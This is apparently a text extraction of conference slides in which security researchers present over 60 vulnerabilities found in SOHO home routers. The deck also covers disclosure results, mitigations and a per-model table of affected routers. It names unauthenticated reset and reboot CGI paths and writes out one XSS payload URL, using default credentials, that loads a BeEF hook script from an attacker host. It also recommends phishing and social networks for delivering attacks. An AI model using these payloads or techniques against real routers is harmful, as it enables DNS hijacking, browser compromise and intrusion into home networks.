Destroying Router Security - NNC5ed

2. About us... Destroying Router Security · NNC5ed2 Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global.

3. Main goals Destroying Router Security · NNC5ed3 Search for vulnerability issues Explore innovative attack vectors Develop exploiting tools Build an audit methodology Evaluate the current security level of routers

4. State of the art • Previous researches Destroying Router Security · NNC5ed4

10. State of the art • Real world attacks - Example 1 Destroying Router Security · NNC5ed5

11. State of the art • Real world attacks - Example 2 Destroying Router Security · NNC5ed6

12. Common security problems • Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Destroying Router Security · NNC5ed7

13. Common security problems • Default credentials • Public and well-known for each model • Non randomly generated Destroying Router Security · NNC5ed8 45% 27% 5% 5% 18% User / Password 1234 / 1234 admin / admin [blank] / admin admin / password vodafone / vodafone

14. Common security problems • Default credentials • Hardly ever modified by users Destroying Router Security · NNC5ed9 “I don't remember what the password is. I have never changed it.” * Gives you a post-it with the Wi-Fi password * “Administrative password of... WHAT?” “Oh!, so we have one of those (routers)?” Users' response when asked about router passwords Best-case scenario Worst-case scenario

15. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10

16. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10

17. Bypass Authentication • Allows unauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Destroying Router Security · NNC5ed11

18. Bypass Authentication • Web configuration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Destroying Router Security · NNC5ed12 Video Demo #1 • Persistent DoS / Restore router to default settings without requiring authentication

19. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13

20. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13

21. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14

22. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14

23. Cross Site Request Forgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15

27. Cross Site Request Forgery • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Destroying Router Security · NNC5ed16

28. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17

29. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17

30. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18

31. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18

32. Unauthenticated Cross Site Scripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Destroying Router Security · NNC5ed19

33. Unauthenticated Cross Site Scripting Destroying Router Security · NNC5ed20

34. Unauthenticated Cross Site Scripting Destroying Router Security · NNC5ed20

35. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21

36. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21

37. Unauthenticated Cross Site Scripting • Or even next level... • But it works! Destroying Router Security · NNC5ed22

38. Privilege Escalation • User without administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Destroying Router Security · NNC5ed23 Video Demo #2 • Privilege Escalation via FTP

39. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24

40. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24

41. Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25

42. Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25

43. Information Disclosure Destroying Router Security · NNC5ed26

46. Universal Plug and Play • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Destroying Router Security · NNC5ed27

47. Universal Plug and Play • Locally • Miranda UPnP tool Destroying Router Security · NNC5ed28

50. Universal Plug and Play Destroying Router Security · NNC5ed29

54. Universal Plug and Play • Remotely • Malicious SWF file Destroying Router Security · NNC5ed30

55. Attack vectors • Locally • Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly • Remotely • The attacker is outside of the victim's LAN Destroying Router Security · NNC5ed31

56. Social Engineering is your friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32

60. Destroying Router Security · NNC5ed33 Live Demo #1 • DNS Hijacking via CSRF Live Demo #2 • Bypass Authentication using SMB Symlinks • Unauthenticated Cross Site Scripting via DHCP Request Live Demo #3

61. Developed tools Destroying Router Security · NNC5ed34

62. Developed tools Destroying Router Security · NNC5ed35

63. 7 3 1 No reply "Not our problem" Other Manufacturers' response • Average 2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36

64. Manufacturers' response • Average 2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36

65. Mitigations • For end users • Change your router's administrative password • Try to delete any other administrative account • At least, change their passwords • Update the firmware... • ... after spamming your manufacturer to fix the vulnerabilities • Do not trust shortened links • Disable UPnP. It's evil • Disable any other unused services Destroying Router Security · NNC5ed37

66. Mitigations • For manufacturers • Listen to what security researchers have to say • Do not include useless services • Specially for ISP SOHO routers • At least, make it feasible to completely shut them down • Critical ports closed to WAN by default • At least: 21, 22, 23, 80 and 8000/8080 • Randomly generate user credentials • Do not include multiple user accounts • Avoid using unsafe protocols (HTTP, telnet and FTP) • Design a safer alternative to UPnP Destroying Router Security · NNC5ed38

67. Mitigations • For manufacturers • XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39

68. Mitigations • For manufacturers • XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39

69. Results • More than 60 vulnerabilities have been discovered • 22 router models affected • 11 manufacturers affected Destroying Router Security · NNC5ed40

70. Destroying Router Security · NNC5ed41 0 2 4 6 8 10 12 14 16 18 Disclosed vulnerabilities per manufacturer Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers

71. Destroying Router Security · NNC5ed42 21% 15% 20% 8% 2% 3% 2% 6% 23% XSS Unauthenticated XSS CSRF Denial of Service Privilege Escalation Information Disclosure Backdoor Bypass Authentication UPnP Vulnerabilities by types

72. Destroying Router Security · NNC5ed43 Router XSS Unauth. XSS CSRF DoS Privilege Escalation Info. Disclosure Backdoor Bypass Auth. UPnP Observa Telecom AW4062 Vuln. - Vuln. Vuln. Vuln. - - - - Comtrend WAP-5813n Vuln. - Vuln. - - - - - Vuln. Comtrend CT-5365 Vuln. Vuln. Vuln. - - - - - Vuln. D-Link DSL2750B - - - - - Vuln. - - Vuln. Belkin F5D7632-4 - - Vuln. Vuln. - - - - Vuln. Sagem LiveBox Pro 2 SP Vuln. - - - - - - - Vuln. Amper Xavi 7968/+ - Vuln. - - - - - - Vuln. Sagem F@st 1201 - Vuln. - - - - - - - Linksys WRT54GL - Vuln. - - - - - - - Observa Telecom RTA01N Vuln. Vuln. Vuln. Vuln. - - Vuln. - Vuln. Observa Telecom BHS-RTA - - - - - Vuln. - - Vuln. Observa Telecom VH4032N Vuln. - Vuln. - - - - Vuln. Vuln. Huawei HG553 Vuln. - Vuln. Vuln. - - - Vuln. Vuln. Huawei HG556a Vuln. Vuln. Vuln. Vuln. - - - Vuln. Vuln. Astoria ARV7510 - - Vuln. - - - - Vuln. - Amper ASL-26555 Vuln. Vuln. Vuln. - - - - Vuln. Comtrend AR-5387un Vuln. Vuln. - - - - - - - Netgear CG3100D Vuln. - Vuln. - - - - - - Comtrend VG-8050 Vuln. Vuln. - - - - - - - Zyxel P 660HW-B1A Vuln. - Vuln. - - - - - - Comtrend 536+ - - - - - - - - Vuln. D-Link DIR-600 - - - - - - - - Vuln.

73. Responsible Disclosure Destroying Router Security · NNC5ed44

79. Conclusion • Has SOHO router security improved? • Hell NO! • Serious security problems • Easy to exploit • With huge impact • Millions of users affected • PLEASE, START FIXING SOHO ROUTER SECURITY • NOW! Destroying Router Security · NNC5ed45

80. TL;DR Destroying Router Security · NNC5ed46

81. TL;DR Destroying Router Security · NNC5ed46

82. Álvaro Folgado Rueda · alvfolrue@gmail.com José A. Rodríguez García · joseantorodriguezg@gmail.com Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com Destroying Router Security · NNC5ed47 Thank you! Q&A Time

Destroying Router Security - NNC5ed

More Related Content

What's hot (20)

Viewers also liked (18)

Similar to Destroying Router Security - NNC5ed (20)

Recently uploaded (20)

Destroying Router Security - NNC5ed